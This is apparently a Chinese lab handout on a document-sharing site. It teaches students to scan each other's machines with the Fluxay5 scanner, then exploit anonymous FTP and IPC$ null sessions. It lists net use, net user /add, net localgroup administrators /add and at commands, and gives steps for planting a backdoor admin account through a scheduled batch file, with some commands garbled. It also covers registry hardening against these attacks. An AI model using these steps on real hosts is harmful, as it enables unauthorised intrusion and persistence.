流光扫描报告打不开.docxVIP

  1. 1、本文档共9页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
流光扫描报告打不开   任务二:使用流光Fluxay5综合扫描工具并分析结果   各部份功能:   1:暴力破解的设置区域   2:控制台输出   3:扫描出来的典型漏洞列表   4:扫描或者暴力破解成功的用户帐号   5:扫描和暴力破解的速度控制   6:扫描和暴力破解时的状态显示   7:中止按钮   8:探测记录查找   选择“文件”→“高级扫描向导”可打开高级扫描向导,设置扫描参数。   扫描结束后,流光会自动打开HTML格式的扫描报告,而且还把可利用的主机列在流光界面的最下方,如图1所示。   图1   单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。   图2   除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描工具设置:   分组角色:学生A、学生B互相扫描对方主机。   实验步骤:   开放FTP服务,允许匿名连接。   打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。   仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。   根据扫描结果分析FTP漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文件。   根据扫描结果分析IPC$漏洞:   IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。   IPC$相关命令:   1.建立和目标的ipc$连接命令:netuse\\目标IP\ipc$“密   码”/user:“ADMIN”,如:netuse\\\ipc$“”/user:administrator   2.映射网络驱动器命令:netuse本地盘符\\目标IP\盘符$,如:netusez:\\\c$   3.和目标建立了ipc$后,则可直接用IP加盘符加$访问。比如:copy文件名\\IP\盘符$\路径\文件名,如:   copy\\\c$   也可直接对映射为本地磁盘的网络驱动器操作。   4.管理计算机上面的账号命令:netuser   ..查看账号命令:netuser   ..建立账号命令:netusernamepasswd/add   ..删除账号命令:netusername/delete   5.管理工作组命令:netlocalgroup组名用户名/add[delete]   ..如:netlocalgroupadministratorssysback/add。该命令表示把sysback用户添加到管理员组。   6.查看目标计算机的系统时间:nettime\\ip   7.在远程主机上建立计划任务:at\\IPTIMECOMMAND..at\\13:45c:\   8.删除和目标的ipc$连接命令:netuse\\IP\ipc$/del   9.断开所有IPC$连接:netuse*/del   10.禁止建立空连接:运行regedit,找到主键[HKEY_LOCAL_MACHINE   \SYSTEM\CurrentControlSet\Control\LSA],把RestrictAnonymous的键值改为:。   11.禁止自动打开默认共享:找到主键   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AutoShareServer的键值改为:,   如果不存在,就新建一个再改键值。   利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:   1.编写批处理文件,文件中包含两个命令:   1)建立一个新账号,   2)将新账号加入administrators组。   2.使用net命令与目标主机建立连接   3.将批处理文件拷贝至目标主机上。   4.通过计划任务使目标主机执行文件。   5.断开所有IPC$连接。   6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。   7.删除和目标主机的连接。   执行安全防护措施:   1.目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享   2.重新使用net命令与目标主机建立连接,观察结果是否有变化。   实验:fluxay5流光扫描软件使用   主题词fluxay流光摘要fluxay的安装   fluxay的使用   实验目的:   学习如何使用fluxay软件来扫描网络,找出漏洞。   实验环境:   Windows系统,flux

文档评论(0)

sanshengyuan + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档